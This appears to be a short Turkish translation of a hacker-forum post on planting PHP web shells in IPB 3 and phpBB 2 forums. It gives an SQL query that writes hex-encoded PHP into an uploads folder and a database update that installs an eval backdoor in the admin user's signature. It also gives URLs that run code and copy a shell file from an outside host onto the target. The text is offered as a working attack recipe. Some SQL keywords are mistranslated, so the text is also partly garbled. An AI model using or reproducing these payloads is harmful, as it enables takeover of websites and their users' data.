Bu ekip ne yapıyor? [a] değişkeninin içeriğini [b] değişkenine kopyalar, yani Shell.txt, Shell.php'ye kopyalanır.
Kabuğun IPB 3'e yüklenmesi
Hadi gidelim:
Destek->SQL Yönetimi->İşlemleri Çalıştırma->Yeni Sorgu Çalıştır
Kod:
"Z:/home/site.ru/www/uploads/shell.php" dosyasına 0x3c3f706870696e666f28293b3f3e'yi seçin
Tam yolu şu şekilde görebilirsiniz:
Yönetici->Destek
Üstte PHP sürümü yazılı olacak ve solda PHPINFO'ya bir bağlantı olacak.
Burada kabuk:
http://site.com/uploads/shell.php
Kabuğun phpBB 2'ye yüklenmesi
1. ex.sql dosyasını oluşturun
2. Oraya kaydolun
GÜNCELLEME phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Burada user_id=2 yönetici kimliğidir
3. Yönetici paneline gidin
4. Yönetici panelinde “DB'yi Geri Yükle” öğesini seçin ve ex.sql'i indirin
5. Kodu çalıştırın / Kabuğu bu şekilde doldurun
Hadi gidelim:
http://target/profile.php?mode=editprofile&e=phpinfo();
Sonrasında:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
Phpinfo()'yu görüntülemek için oturum açmanız gerekir.
Bu, merminin nasıl ve hangi motorlara yüklenebileceğinin kısa bir listesidir. Daha fazlasına mı ihtiyacınız var? Rdot'taki arkadaşlara hoş geldiniz
forumlara yükleme
cms doldurma
Ve işte benim en sevdiğim kabuk, ayrıca rdot'ta))